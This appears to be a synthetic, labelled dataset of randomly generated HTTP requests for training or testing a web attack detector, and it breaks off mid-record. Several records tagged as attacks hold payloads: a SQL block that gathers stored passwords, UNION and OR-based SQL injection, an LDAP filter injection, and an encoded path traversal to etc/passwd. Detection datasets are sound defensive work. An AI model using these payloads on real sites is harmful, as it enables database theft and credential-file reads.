UA-Disp: 322,606,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 649x451
Via: 5.5 34.218.223.96, 7.2 www.edda.jpg, 5.6 57.199.50.218
Transfer-Encoding: usTD
Upgrade: 82r/8.3, ehi/8.7
Warning: 941 www.iehcba.gif:913 "elrrSd" 
X-Forwarded-For: 146.237.137.95
X-Serial-Number: 300384
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37886
Start - Id: 41457
class: SqlInjection
POST /uIoFI@ty.anN/itiC_OyGgu5I@eassGw5/twynnAemin/rciau1ec4rf0hi/-T1b4EC0.jpg? HTTP/1.1
Content-Length: 396
Content-Language: Aze,yanAfih,a
Content-Encoding: deflate
Content-Location: /nhttzes/eeeenar/une2iEO/daon.nsf
Content-MD5: cWFiaG9lcjhlb090ZUVmaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 17 May 04 09:26:54 CET
Last-Modified: Wed, 24 May 06 13:42:20 GMT
Host: www.Pdpggun.uk
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: x-mac-icelandic
Accept-Encoding: 
Accept-Language: e4lShhu-ohesDdi;q=0.9, aswoweh-AmExwh, nltefig-iehdlz0
Cache-Control: max-stale
Client-ip: 165.216.117.58
Cookie: Udivx9lPEFyR=1377;2gtbaraegactl=74;d2onsd1=iesodf9aeI:~3iood;oathqe=wqTfS;dsorsaeataye2e=4
Cookie2: $Version="83"
Date: Thu, 03 Aug 06 19:26:07 GMT
ETag: W/"UtjPHEnCvSW5I-JRNNL"
Expect: qbgdelee=Idon
From: utrstns@Temsn.st
If-Modified-Since: Fri, 26 Mar 10 15:00:47 UTC
If-Unmodified-Since: Thu, 12 Jan 06 10:48:15 CET
If-Match: "V5f_NPqKCaGDBLf5pB"
If-None-Match: "mzVu4hVI04QsmhYh"
If-Range: "A6dE0CMJSLmqFf1d"
Max-Forwards: 40
MIME-Version: 2.7
Pragma: irseutt='nw'
Proxy-Authorization: Digest uri=http://www.qaseCc.net/doze/ikttvm/5wrye.js
Authorization: Basic cndpdDo3MHNqYXc=
Range: 863-,45-,1-
Referer: /7lsbPlsz/rl6ooa75/malsm/eawj1a/2oIzl.cfm
TE: trailers,gzip
Trailer: Expect
User-Agent: Mozilla/0.2 (Windows; U; Win 9x 8.0; 1M-pa; rv:4.3.0) Gecko/68152275
UA-CPU: MIPS
UA-Disp: 338,3350,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 254x5165
Via: Wns/7.5 www.shdanli.jpg
Transfer-Encoding: utnba
Upgrade: oin5s/2.1, itrt/4.7, tsm/7.1
Warning: 500 www.ahpvda.gif "wpsouzhnbeu6jkz5A" "Sat, 07 Oct 06 04:07:23 UTC"
X-Forwarded-For: 12.79.200.187
X-Serial-Number: 9168693821015244526
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Hxnode6-bzYStelnetq=neoLnfm&5_QKhM1_fG=';    begin declare    @ret   varchar(8000)  set @ret=':'   select  @ret=@ret+'    '+sjomR+'/'+password     from     rtteim     where    nz2sp>@ret     select    @ret   as    ret     into foo    end--&siaiteponua8ce=lhaesedsOeaU4r] &i4ss=oKAm9e&3uybottryys=rn&Sees=e-A2Zy&yuebavtlE=@[&Veshla4@l7W1=676

End - Id: 41457
Start - Id: 37407
class: LdapInjection
GET /hE4MMw90_OUdx/9ALQtg9/Sgd4X8serviceshomeo.htm? HTTP/1.1
Host: 206.23.41.118
Connection: close
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.0
Accept-Language: rulttcRl-iiz, oe-aA;q=0.2, pn0ssaij-neHdo
Cache-Control: only-if-cached
Client-ip: 249.124.138.253
Cookie: uopen7iS.Ahttp=l7w)(    |  (T1h7a=*);oawbl0d=527
Cookie2: $Version="84"
Date: Fri, 16 Apr 10 11:40:05 CET
ETag: "XD5I.lskin7RRYarIK1"
Expect: 100-continue
From: 3ear@vimqehoae.fr
If-Modified-Since: Thu, 25 Jun 09 24:18:00 UTC
If-Unmodified-Since: Wed, 21 May 08 19:40:06 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1707
MIME-Version: 8.7
Pragma: Rinibg=ntcotY
Proxy-Authorization: Digest algorithm=MD5
Authorization: Digest nc=da84E138
Range: 082112-540,03898-739302,66-304
Referer: /t8jy1mhE.conf
TE: chunked
Trailer: Accept-Charset
User-Agent: Mozilla/5.3 (compatible; noourbndp; Open BSD i386; Eo3trOai; 9uct; qegh)
UA-Disp: 143,2118,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 005x049
Via: ssrp7/9.9 145.206.48.227
Transfer-Encoding: identity
Upgrade: sdkeds/7.2, acodv8/1.5, netitb/9.6
Warning: 217 www.stcrad.css "wuagfnnrboaaIfmYhras" 
X-Forwarded-For: 165.215.42.96
X-Serial-Number: 0741742884020240
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37407
Start - Id: 44786
class: PathTransversal
GET /ys2bhzrsT/a1ZlogM/aAeiurgxlenwhar/ioalauYeijextgeaulf/sLHgcwpassthruw6/aCA1dN4RWWML/4Ih@w3NU.hlv1cc/hF2QEBa9/hTwlm9Dha78Tje.tiff?Irhyepsar=2109&mtRbeaBdsra=669166314&tjstleecptt=288&Eas1see5c=8287&apNatd=doc%28++++file%3A%2F%2F%2Fc%3A%2FfgnI%2Fsnt.xml+++++%29&oprocessing-instructionT.ZPm=oia&foe5thlpEwa=hk6IvQ-bSOh&uatthno=477645&Drfservicesservices.z9=r62&rjQ_To@VZ4oand=eehemdetf%2Bsam&5agdTuih=4301949677 HTTP/1.1
Host: 3.254.160.20
Connection: close
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 108.193.198.116
Cookie: neet=9157226;pWuvrbnuh=df|
Cookie2: $Version="24"
Date: Sat, 24 Feb 07 21:06:51 GMT
ETag: "iFE2lKQFDoEmCoaqzw"
Expect: 100-continue
From: Cmaxdcp@rimabEod.be
If-Modified-Since: Thu, 31 Aug 06 03:55:02 GMT
If-Unmodified-Since: Sat, 20 Feb 10 11:26:53 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 0.5
Pragma: cTE='aMn'
Proxy-Authorization: NTLM c0lyb3NlYTRVYWluMmhpY3d0YnRCZXRUd3l0dGNlb2RvdXRyZGx2cnlh
Authorization: Basic bnRydEJlQTpxbWRR
Range: 39-79901,6-
Referer: /Tylnom6v/tnm3nsc/e2toij7s/mts9/s4I5eesn.bin
TE: deflate;q=0.1,trailers,deflate;q=0.7
Trailer: Expect
User-Agent: pHU7ZwBj http://www.to4Oet7a.com
UA-CPU: MIPS
UA-Disp: 3445,5667,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 822x152
Via: 1.2 160.216.253.69
Transfer-Encoding: identity
Upgrade: esi/8.5, tw4ftd/0.3, 7ja/8.6, tnxgiT/3.3
Warning: 136 www.f72ts.jpeg "daakn3ltgiptelaits" "Sat, 10 Oct 09 20:12:41 UTC"
X-Forwarded-For: 87.170.85.167
X-Serial-Number: 2157159271334
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44786
Start - Id: 17500
class: Valid
GET /nsotyaast6mh/eACioc/nFo-fozdSv/tVdnK8qR/N0dotgEg3g.RqTXS/Y_XeHKHCP/pgSzvabn7hewlezsteh/uDDK.10YfVn/uWuei4jLGs-/iminDya6ezedx9A/8KZfq7/wsXNWl.js? HTTP/1.0
Host: 67.137.65.187:7
Connection: vcmkoshH
Accept: application/zip
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=29328
Client-ip: 252.240.14.144
Cookie: 2@HmetavMWvDt=198062621
Cookie2: $Version="132"
Date: Wed, 10 Jun 09 24:34:33 CET
ETag: "VfDQeglA-OWCeNU4sa"
Expect: ienIuati=hEeenN
From: eg1jIllr@0ndu.st
If-Modified-Since: Tue, 15 Nov 05 07:30:31 CET
If-Unmodified-Since: Sat, 27 Sep 08 20:53:52 GMT
If-Match: "NoolCNKpbtZMnZzRv"
If-None-Match: *
If-Range: "xa3-oUu.GFmHfZG9Xk6c"
Max-Forwards: 70
MIME-Version: 5.7
Pragma: foer='rriet'
Proxy-Authorization: Basic YTFubDpleTFzbnVl
Authorization: Digest cnonce="r5y8"
Range: 6-05,-0890
Referer: /iU5S3jr/e8oa/eiWera/rscsf/enhlV7.jsp
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/1.7 (X11; U; Open BSD i386 6.5; 44-Ga; rv:1.7.5) Gecko/80193926
UA-CPU: x86
UA-Disp: 847,874,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 6336x8003
Via: 1.4 www.mwooio4.js, 8.8 www.tsnanois.tiff, 5.7 www.tle1.js:7
Transfer-Encoding: identity
Upgrade: wys/9.8, dwn/4.4
Warning: 717 www.sihute.js:411 "rxtlf8maScstprd2" "Mon, 15 Feb 10 02:09:14 CET"
X-Forwarded-For: 152.234.23.25
X-Serial-Number: 677288661240188705
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17500
Start - Id: 41468
class: SqlInjection
PUT /ejytylarnemortay/nslxnfmdeds/aK29/nyesalliPn/b8kVdV-U8lAxY/sii3flNh0i4ftq/eyY@i67V/twADkWgc6Hry/dakMkuxahieheb/8N_M8QDIX/elj6MzpFLH_5.php4? HTTP/1.1
Content-Length: 298
Content-Language: heeen6s,w
Content-Encoding: identity
Content-Location: http://gh5taIdh.uk/hiMNae.asp
Content-MD5: TmU3ZnNVMW9jZFNtdGhvZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 19 Sep 07 17:57:45 UTC
Last-Modified: Tue, 25 Oct 05 15:57:08 GMT
Host: 194.67.212.246
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: esyaocee='8'
Client-ip: 79.61.119.137
Cookie: ognteathh=kyCBGaM3l-dS;t146h=6sam'betweennc4igl;vjhjina9eD=44652987
Cookie2: $Version="67"
Date: Fri, 11 Feb 05 02:59:45 UTC
ETag: "sthKhUmpoIefQLam-l"
Expect: 100-continue
From: utrstns@Temsn.st
If-Modified-Since: Thu, 09 Dec 04 03:52:25 CET
If-Unmodified-Since: Wed, 02 May 07 21:36:52 GMT
If-Match: "M3AVgpaAqRcFoUfqHzc"
If-None-Match: *
If-Range: Thu, 03 Jun 04 14:16:54 UTC
Max-Forwards: 0
MIME-Version: 2.7
Pragma: ne=taavEa
Proxy-Authorization: Basic NkJjbTphZ3JsMmp3ZQ==
Authorization: Digest username="syteln"
Range: 863-,45-,1-
Referer: http://tpepnytt.org/he3rc/hh2eZ/hishCd0/cPhDn/hi3sbalC.php4
TE: trailers,trailers
Trailer: Expect
User-Agent: syosaoas/3.5.7
UA-CPU: MIPS
UA-Disp: 338,3350,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 054x8213
Via: HTTP/0.0 125.86.127.149, 7.9 www.ooncc0v0.htm:40, HTTP/4.2 www.lnX8.jpg
Transfer-Encoding: gzip
Upgrade: EorNU/7.3, mot/1.8
Warning: 103 220.132.115.129 "d1xevs" 
X-Forwarded-For: 158.24.142.97
X-Serial-Number: 40748942
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

cSVT4PzHe76=eEkDQ9T7A&jd2zonll9nmscwm=olsrk2eIif&ptbtnc52s=13&copyZqcK3=RsakooHe9nsn8e1s&9nN6wLg0m=720201&emt='  UNION        ALL           SELECT oy    FROM   ane26s4 WHERE   ''  =    '&azurb=62&aqFtept=2057081&Ygazkz7ojtlno=38ouycnddsl&PpEJ1D0P=tMBTH7VxJM&ouaiZoiuoco=Iheqronapusojdzoeu

End - Id: 41468
Start - Id: 35446
class: SqlInjection
POST /nhO/1sanTlfhSoz0/mHUD7fy1mw@u8K6wYZtX/onEnra8ed/CierSls/taruh6awsosysi/Cfyk2Gtnc.gif? HTTP/1.1
Content-Length: 274
Content-Language: eisda,e
Content-Encoding: compress
Content-Location: http://hieytgd.biz/24uoe/jepoFe/l6f3siO.css
Content-MD5: bmN5bmJscVp0ZTBlcjZpcg==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Wed, 30 Nov 05 18:19:43 GMT
Host: 218.6.51.112
Connection: 8znj
Accept: */*
Accept-Charset: isiri-3342
Accept-Encoding: 
Accept-Language: tsva-nam;q=0.9, joRk-oyDrHqa;q=0.2, thrwi1le-etepa9n7;q=0.0, arzei-ada
Cache-Control: max-stale=1
Client-ip: 208.4.23.62
Cookie: dehiYuhi=6785208;ChxAet1mr=hem
Cookie2: $Version="506"
Date: Tue, 21 Oct 08 02:44:23 CET
ETag: W/"ypygGJXJUUoEf@D"
From: adnsm@M3eOy0te.org
If-Modified-Since: Thu, 29 Jun 06 09:20:38 UTC
If-Match: *
If-None-Match: "VtqeLYPGbZerKUg8UI"
If-Range: Tue, 01 Jun 04 23:56:17 CET
Max-Forwards: 523
Pragma: 6of=Ugnt
Authorization: Digest algorithm=MD5
Range: 8-,99-3,-630
Referer: http://www.9mn7.com/sLEwy/ttleooih/t1un1ecT/hoeJane/lonte.txt
User-Agent: '     /**/    OR     /**/''=  '
UA-CPU: 68000
UA-Disp: 866,8235,16
Transfer-Encoding: deflate
X-Forwarded-For: 88.8.97.255
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

ltlnEd7ptve=napsjn9 &qtb=39045&xs=5>xp_Dilink6serm&taou0e9=oo rbh=bhaoeroa5cr]&bizahcoteieo=0490894&elnnudem=So@fik$]tbsoo$r&nkmdhQlaFw8N=4ff8dusra|lraod%7netcat&3Do=u gsbstyle&lee1=uTwi5L&mtn2v=form5 ge\group bya0geoqe]0&3adxLo3edemit=itPseacaEeiiG1sr

End - Id: 35446
Start - Id: 1942
class: Valid
GET /orcihpwZoeha/Krp/ssERQPtFqkAP@BBl6/UanTexecinputD.sh?ee9a=0d&aayetdoEe=ysNdtaS%2BrbF3out&oeuRrnostc=nwpu5qaf4g HTTP/1.0
Host: 120.225.232.161:80
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: isiri-3342
Accept-Encoding: 
Accept-Language: daIhh-ly3i, ciro2eii-mg, aseoC-wd, ib3nyh-awldei6;q=0.0
Cache-Control: no-transform
Client-ip: 152.106.51.28
Cookie: sgroTHEiN0oete=5cwuP6e|mx4aesnbdAc;sfssnncezd=uk0cZC84hj;su9dgtIn5=Eyag9c
Cookie2: $Version="6"
Date: Thu, 01 Jan 09 19:12:05 UTC
ETag: W/"SLmMXLc63s.SN-b7H1Rf"
Expect: r6od=urssnn7;cduho=rrd5a9es
From: pvxch@7harUebet.com
If-Modified-Since: Mon, 20 Feb 06 03:16:46 UTC
If-Unmodified-Since: Fri, 21 Jul 06 17:24:11 CET
If-Match: *
If-None-Match: "D9mASwvmqB3b2D9q81"
If-Range: Thu, 12 Feb 04 14:32:53 GMT
Max-Forwards: 2893
MIME-Version: 1.0
Pragma: tees='Eul'
Proxy-Authorization: Basic d0NpYjlsZTo2b2dxbnRl
Authorization: 8erMn usNE=cpeNs1
Range: -8,9401-9800,-599
Referer: http://nhLdnit.st/tpt5es/wsee2/i1tm1nBe.mpeg
TE: trailers
Trailer: Date
User-Agent: Hnmipaneesc
UA-CPU: Sparc
UA-Disp: 0367,7065,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 1543x007
Via: ipu/8.9 www.zua55.js
Transfer-Encoding: identity
Upgrade: tsd/0.2, alvm/0.6, iEenc/5.7, nnoc/8.2, rtetzy/1.1
Warning: 663 www.Libe.html "iztelp" "Wed, 09 May 07 24:02:00 UTC"
X-Forwarded-For: 218.173.209.61
X-Serial-Number: 539815603365
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 1942
Start - Id: 34326
class: Valid
POST /dvxLdq9H3xin25D-/ZYYV6lmeo/b2lMp1luNIJ/7hgTnwaXn/rrk/N2-Z2.swf? HTTP/1.0
Content-Length: 81
Content-Language: pyo,8eh,t5Dg3sce
Content-Encoding: compress
Content-Location: /wlttcrar/oAvc5/eoUniheE/icm0dN6.sh
Content-MD5: aWJ1bW10eTZ4dGV3U3NhSA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 09 Apr 10 05:15:12 CET
Last-Modified: Sun, 01 Feb 04 13:29:33 CET
Host: www.5aagi.st
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-cyrillic
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: no-cache
Client-ip: 78.63.251.80
Cookie: sok4nef=hBytLKd1iv;ksavnhinrm=Ucot|1e;DS@gMuj=naRzn;amscgbrMOolHen=018
Cookie2: $Version="03"
Date: Wed, 24 May 06 17:23:06 UTC
ETag: "adYjPYqUsr6tQ5YM"
Expect: 100-continue
From: viamr6@yergvcA.biz
If-Modified-Since: Wed, 20 Oct 04 19:36:53 GMT
If-Unmodified-Since: Tue, 25 Nov 08 09:03:52 UTC
If-Match: *
If-None-Match: "5BCwEOWsOvze-JB"
If-Range: Fri, 06 May 05 20:24:24 CET
Max-Forwards: 780
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: NTLM aU9yd2hldW1uZ3RycnFtdUhqZUE0b3U5cmVzdGJyc3RhZTFnYWk1bnZveWVMbQ==
Authorization: NTLM dDBvaXV0aWVlYTNjYW5hQW16ZWFiZUdwYW9sZGVic2xtaGI3M2l6ZWF1
Range: 57611-03,96861-67,47-486
Referer: http://www.2no2hu.st/t4et/fenm/aa4osill/rc8oE/pHYyrIuc.zip
TE: trailers,gzip;q=0.8,deflate;q=0.7
Trailer: Upgrade
User-Agent: Mozilla/1.2 (Machintosh; U; PPC Mac OS X 7.9; Rx-ot; rv:2.9.9) Gecko/74218957
UA-CPU: Sparc
UA-Disp: 693,674,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 9714x0556
Via: 9.7 www.Bdyeer.html, 3.6 71.123.107.41, 7.3 www.s7oi9F.css
Transfer-Encoding: deflate
Upgrade: lOrae/2.3, unerfn/4.1, roft/4.9
Warning: 571 181.113.113.112:0793 "rNeosa7sItoposildet" 
X-Forwarded-For: 252.208.59.218
X-Serial-Number: 57690312658
----: -----------------
~~~~~: ~~~~~~~~~~~~~

ecbnlsMyk2t=aUG2Na_&tTdfidttAfe3t=6038363&sngocnis=sr8HiQoeSR&boErt4hRmpt=tWRo_LY

End - Id: 34326
Start - Id: 46372
class: PathTransversal
GET /Ly/ooneIi/hzsihJwLd.P/zduyP9ehnaeolenaoErm/pbwaavTT/zyV703ajIx8xp_/rccRstLlnrptThyeh.shtml?ertho6oyr=-fhi%27rst+hi&3fi=hrAmr0ee&okwreaXznwubazW=qv_&eeNsp=684308&b0mR=%3C%3Adh&iT0da58Lel=etnNvzsefHit5n&e1ibE=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&ehoos=36890907&gsdhapiipt=n19Oz&o3ir4tlea=xDrz5.ymMhYf&4RexecUn9=yrsa7dpsea2s&eSsUae7edt7s2=f0uhfuh&oieo8huiciv2=28676&qVdeleteQWsIe4=6267&oleqwlqINgonw01=e1nEnts3rDsslL HTTP/1.1
Host: www.hadrem19n.de
Connection: ua3yuh
Accept: */*;q=0.7
Accept-Charset: windows-1254, shift_jis
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 214.183.248.166
Cookie: erdnjtHe02ies5=5466476;yeisni7d2exTln=29468591;mdseaa2neeEs=68
Cookie2: $Version="86"
Date: Tue, 03 Apr 07 21:38:49 GMT
ETag: "GFsg.faK@trgN@CsoV"
Expect: aLad45hr=rfp3r;ngee=E8R2
From: cewts@1fgr.fr
If-Modified-Since: Sun, 18 Apr 10 23:41:21 GMT
If-Unmodified-Since: Wed, 20 Aug 08 14:09:37 CET
If-Match: "kMla4HoPweULTAzJn"
If-None-Match: "pcMMfBcBpW4B.Uakz"
If-Range: "zOITDYoJbD-BDD6F"
Max-Forwards: 3
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: NTLM YWFHbUVzVWVJY2E0dmY0bHNybWVkbnJuUmJlMHNhamlobG8zdXM=
Authorization: Digest uri=http://iYet.net/eeyag9.jpg
Range: 2-1818,846125-
Referer: /svncO/gujn.zip
TE: trailers,trailers,chunked
Trailer: From
User-Agent: aasmed (eMy0jSbT; topbHe6; oGDPYT0Me; cN2XcwE)
UA-CPU: StrongARM
UA-Disp: 4968,8587,8
UA-Color: color8
UA-Pixels: 3216x516
Via: HTTP/1.9 101.177.4.194, Iefdf/2.8 181.122.189.11, 7.4 116.127.38.140
Transfer-Encoding: compress
Upgrade: ls17ea/6.1, if8/2.6, eEewts/0.2, pvyt/8.4
Warning: 019 www.7IncbS.jpeg "Lwzurocdatoo" "Fri, 17 Apr 09 01:12:13 UTC"
X-Forwarded-For: 241.79.66.180
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46372
Start - Id: 10013
class: Valid
GET /sphdYasgpwnob/PaYvnxv5f/eBDUAqiyCi8Z1xAj/kMtKG.6/n@brH.3-p.htm?mn9lia=t34403ldT&systeml-mailtS-=ldhrcpioer0e%29t5S&cubLHf=6228&9fcGhe5a=t9&daneSlzlufp=esaNieei&CLgecho8lK=ftpcd%7E&istrE=94 HTTP/1.0
Host: 130.109.194.156
Connection: Aemd
Accept: */*
Accept-Charset: x-mac-chinesesimp, x-mac-cyrillic;q=0.3, iso-8859-2;q=0.7, shift_jis, isiri-3342;q=0.2
Accept-Encoding: 
Accept-Language: epoqtsz-4aht;q=0.3, heei1-rldQ;q=0.4
Cache-Control: tritn=e
Client-ip: 102.147.145.53
Cookie: snmSnAo=linkee;uinput7WnullGv1y=2208637;bai70ondlt=988;raul=610602582
Cookie2: $Version="94"
Date: Fri, 03 Jun 05 24:50:19 GMT
ETag: "37Du@YuAnBeW63f@"
Expect: dbatep=eaimta;sxhc=etxenhdO
From: 2rbOee@urmb.de
If-Modified-Since: Wed, 15 Nov 06 13:37:24 GMT
If-Unmodified-Since: Mon, 03 Sep 07 21:29:22 GMT
If-Match: "_atucQgMH@H0dlST"
If-None-Match: "o6mXb0I91nv87T2lr_1S"
If-Range: "bBMmfvHNkTF317_6."
Max-Forwards: 40
MIME-Version: 6.6
Pragma: nuin='edh9'
Proxy-Authorization: tshs Axeteu=gear
Authorization: Basic Z2hhYTphdHNvNnZycw==
Range: 7-,1-2,575-73
Referer: http://3ettnnn.fr/a3y7e2to/oqsfaM/rflc/omduee/iceiMw1.dll
TE: trailers,trailers
Trailer: Connection
User-Agent: Mozilla/6.6 (compatible; MSIE 1.8; Win98; eowilesaga)
UA-CPU: 68000
UA-Disp: 0205,052,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 470x7016
Via: HTTP/9.5 www.mimrt.jpg
Transfer-Encoding: gzip
Upgrade: mhctc/9.6, qnohb/2.6, eIB/7.4, i4eI/6.0, Nec/8.9
Warning: 441 www.sNfaestc.html:841 "a3fh" 
X-Forwarded-For: 48.85.205.201
X-Serial-Number: 54263
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10013
Start - Id: 20022
class: Valid
GET /iot5aeht3guru/CDwindow.openir/i7hanhfadyesnteOtb3/qdaaa9jtd/cnlr0Z/4Xw99T4-mugcByk/4rm6LvYCxuW.asp?smZe4rsa=267521663 HTTP/1.0
Host: 216.71.93.252:62
Connection: s129Een
Accept: text/xml;q=0.7
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.9
Accept-Language: rneeehtO-ereego;q=0.4, m-xtssasl, lnhes-eshr4fU, h4CR-Allage;q=0.5
Cache-Control: min-fresh=8804
Client-ip: 227.143.162.237
Cookie: 2ind=356;Hla=eTlre;r2sctgr=edfiu
Cookie2: $Version="5"
Date: Sat, 09 May 09 24:32:22 UTC
ETag: W/"hb3K6rPvSU6q_38b"
Expect: 100-continue
From: fiyrdNy@miRwaddr.cz
If-Modified-Since: Sun, 21 Aug 05 18:42:11 UTC
If-Unmodified-Since: Mon, 15 Mar 10 21:52:20 GMT
If-Match: *
If-None-Match: *
If-Range: "x7vBihiGHe6@ELgRk-08"
Max-Forwards: 37
MIME-Version: 9.6
Pragma: oson='0'
Proxy-Authorization: Basic bnhoZEV5OnJkTmVldGk=
Authorization: tnbMes dtnlvsU=enclxbjn
Range: -9850,-091367
Referer: http://TriTa.be/eoR50x/aGeZh.gif
TE: deflate;q=0.8
Trailer: Date
User-Agent: oridh (obwMJ14; eGvbV.ebtg)
UA-CPU: PowerPC
UA-Disp: 6419,466,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 6883x9445
Via: 2.1 www.seorde.jpeg, FTP/2.4 www.jtktoTa.gif
Transfer-Encoding: gzip
Upgrade: hOdDrk/2.2, heah/7.0, trac/2.7, rIfahb/1.5, oeeca/4.1
Warning: 933 www.eoio.png:16177 "hIirthSs" "Tue, 06 Feb 07 23:19:23 CET"
X-Forwarded-For: 99.9.48.167
X-Serial-Number: 185531423
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20022
Start - Id: 24961
class: Valid
GET /LWXa00vY/BPsxrejh@yZ4WDH/9services4WQDinputMF5TXiGa/hs7pdwne/MinsertV/eHc8Dk/ebEH/7AfO/heowa3pZr6haot7st.msf?EitwYsomti=hr6drVVyVZi&eywaintnitarl=5&WscriptpUMn=wrwlaypea&cluOcsemAOssNb=929623&r5toEweOGQek=r%2F&vthAs=98 HTTP/1.1
Host: www.oii5vt.gov
Connection: iEnsUef
Accept: audio/x-wav, text/*;q=0.7, audio/*;q=0.7
Accept-Charset: *
Accept-Encoding: *
Accept-Language: tntYed-diO, edsNnae9-gaJeNo, l-xgnr
Cache-Control: no-transform
Client-ip: 115.80.65.226
Cookie: ocmnnnnnph=215690;shEthh=462;gazooatn=bui2shdropb;mdnsriebIuBr6i=d tUadminapRvaaeu(ekecopys%
Cookie2: $Version="2"
Date: Sat, 07 May 05 02:57:52 CET
ETag: W/"SImW8X_MZ.SowaC"
Expect: 100-continue
From: iefmllR@anati.de
If-Modified-Since: Thu, 23 Feb 06 07:15:48 CET
If-Unmodified-Since: Sat, 20 Jan 07 19:25:36 GMT
If-Match: *
If-None-Match: "6q7fPJucTdIQXOl@fAr"
If-Range: Mon, 28 Nov 05 17:51:35 CET
Max-Forwards: 08
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: NTLM bmRzUmZ0b3RudnltbmJ5bXRqdTN0c3N1dTRON3lFaWVzb2k=
Authorization: NTLM Y2JhbGU1a2ltdW4waXdZb3JvcmFhaWxhNmJzZWFvaXRUczFveWlyQW5lZWhpZWVq
Range: -652846
Referer: /ivda/r8Fdnae/hdrEle/t0Io/e9Hap.mdb
TE: trailers,trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/3.1 (Machintosh; U; Mac OS X 2.4; wy-f9; rv:5.1.1) Gecko/52110336
UA-CPU: PowerPC
UA-Disp: 028,484,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 778x801
Via: HTTP/8.6 www.hu2ari.tiff
Transfer-Encoding: gzip
Upgrade: 3bda/0.6, httrt3/8.5, bqt/6.9
Warning: 586 www.xoesS.jpg "tereeuOoER" "Sun, 31 Oct 04 12:03:58 GMT"
X-Forwarded-For: 86.74.11.156
X-Serial-Number: 2466804840974150
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24961
Start - Id: 19724
class: Valid
GET /ffa6o9ci@sB/t1l/44htremnuesnAd/sZDGtKWzRSyuPkaKK.gif? HTTP/1.0
Host: www.foaefhne.gov
Connection: keep-alive
Accept: image/png;q=0.5
Accept-Charset: iso-2022-kr
Accept-Encoding: 
Accept-Language: ete-fkrhantr, Hy-alnaec;q=0.2, qdas-thewsxRI, djnbV-tptma;q=0.4, Nens-vT;q=0.6
Cache-Control: max-stale=43
Client-ip: 221.220.170.107
Cookie: dga=3oYvR;satrl=aRY1VBVO7n;4OkFZ=5918694;yunaeoet=e6BT;nnehrfaasr=mlolbly;6noVc3h9iaei=56679
Cookie2: $Version="61"
Date: Mon, 11 Aug 08 10:20:55 GMT
ETag: "V1lWg_ncK6h5OV@1t"
Expect: int1eyb
From: moea@estmzx.uk
If-Modified-Since: Sat, 01 Dec 07 21:47:40 GMT
If-Unmodified-Since: Sun, 06 Aug 06 06:13:24 GMT
If-Match: *
If-None-Match: *
If-Range: "3PciEcw8w.eZv4sP1"
Max-Forwards: 641
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: NTLM aWVyN3VzaG8wbmhjaGNhb214SW9uN2FldHMzTWl0c2RvYW4ya2lIcGQ=
Authorization: Basic ZHJpdGlvOnNybmV0dHBh
Range: 521-871
Referer: /Ao8rNl/ney8y.exe
